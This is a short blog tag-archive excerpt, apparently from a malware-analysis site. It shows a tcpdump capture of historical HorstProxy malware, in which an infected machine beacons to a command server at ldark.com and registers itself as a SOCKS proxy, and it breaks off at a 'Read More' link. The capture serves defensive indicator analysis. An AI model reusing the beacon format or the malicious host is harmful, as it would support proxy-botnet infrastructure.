Tag Archives: HISTORICAL Malware Sample – HorstProxy – Traffic Sample Indicators Analysis

HISTORICAL Malware Sample – HorstProxy – Traffic Sample Indicators Analysis

2013-05-12 14:32:23.969210 IP 172.16.253.129.1057 > 69.43.161.152.80: Flags [P.], seq 1:126, ack 1, win 64240, length 125 E….;@…i…..E+…!.P.r……P…F\..GET /socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0 HTTP/1.1 User-Agent: Mozilla/5.0 Host: ldark.com     2013-05-12 14:32:23.969386 IP 69.43.161.152.80 > 172.16.253.129.1057: Flags [.], ack 126, win 64240, length 0 E..(……..E+…….P.!…..r..P…………. 2013-05-12 14:32:24.102970 IP 69.43.161.152.80 > 172.16.253.129.1057: Flags [FP.], seq 1:290, ack 126, win 64240, length… Read More »

Share Button